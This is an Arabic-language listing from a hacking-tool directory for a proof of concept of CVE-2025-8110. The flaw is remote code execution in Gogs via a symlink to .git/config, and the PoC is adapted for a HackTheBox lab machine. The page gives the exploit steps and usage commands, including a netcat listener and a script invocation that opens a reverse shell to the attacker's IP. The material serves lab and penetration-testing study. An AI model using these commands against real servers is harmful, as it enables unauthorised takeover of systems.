Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-8110-Silentium-HTB — CVE-2025-8110 مخصصة لـ Silentium box على HTB. | Kitploit
أدوات/GitHubGitHub/hassan-hamadi/cve-2025-8110-silentium-htb
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليم
GitHubhassan-hamadi/cve-2025-8110-silentium-htb

CVE-2025-8110-Silentium-HTB

CVE-2025-8110 مخصصة لـ Silentium box على HTB.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

CVE-2025-8110 — Gogs RCE PoC (Silentium / HackTheBox)

إخلاء مسؤولية: هذه الأداة مخصصة حصريًا للأغراض التعليمية واختبار الاختراق المصرح به. استخدمها فقط ضد الأنظمة التي لديك إذن صريح لاختبارها.


هذه نسخة معدلة من zAbuQasem/gogs-CVE-2025-8110، تم تعديلها للعمل ضد جهاز Silentium على HackTheBox. تطلبت الـ PoC الأصلية تعديلات للتعامل مع تكوين Gogs المحدد لـ Silentium وتدفق المصادقة.


الثغرة الأمنية

CVE-2025-8110 هي ثغرة تنفيذ تعليمات برمجية عن بعد (RCE) في Gogs، وهي خدمة Git مستضافة ذاتيًا.

لا تقوم نقطة نهاية API لتحديث الملفات في Gogs (PUT /api/v1/repos/.../contents/<file>) بالتحقق مما إذا كان الملف المستهدف عبارة عن رابط رمزي (symlink). يمكن للمهاجم المُصادَق عليه دفع رابط رمزي إلى مستودع يشير إلى .git/config، ثم استخدام API لاستبداله بحمولة ضارة. تقوم الحمولة بحقن sshCommand مخصص في تكوين git، والذي ينفذه Gogs من جانب الخادم في المرة التالية التي يقوم فيها بعملية SSH على ذلك المستودع، مما يؤدي إلى تنفيذ تعليمات برمجية عن بعد.


ما تقوم به الـ PoC

  1. يُصادق على Gogs ويستخرج رمز CSRF من صفحة تسجيل الدخول.
  2. يُنشئ رمز API لـ Gogs عبر صفحة إعدادات المستخدم.
  3. يُنشئ مستودعًا جديدًا عبر API مع تمكين SSH.
  4. يستنسخ المستودع محليًا، ويضع رابطًا رمزيًا (malicious_link -> .git/config)، ويدفعه.
  5. يستدعي API تحديث الملف على الرابط الرمزي، لكتابة .git/config ضار يحتوي على sshCommand = <reverse shell>.
  6. يتبع Gogs الرابط الرمزي ويستبدل ملف .git/config الخاص به، مما يؤدي إلى تشغيل الصدفة عند عملية SSH التالية.

الاستخدام

تثبيت التبعيات:

root@kitploit:~
pip install -r requirements.txt

بدء مستمع:

root@kitploit:~
nc -lvnp <PORT>

تشغيل الأداة:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>

اختياري — التوجيه عبر Burp Suite:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
تنزيل الأداة
العلم (Flag)الوصف
-uعنوان URL الأساسي لـ Gogs
-lhعنوان IP الخاص بك (الجهاز المهاجم) (مضيف الصدفة العكسية)
-lpمنفذ المستمع الخاص بك
-unاسم مستخدم Gogs المسجل لديك
-pwكلمة مرور Gogs الخاصة بك
-x(اختياري) توجيه حركة المرور عبر Burp على localhost:8080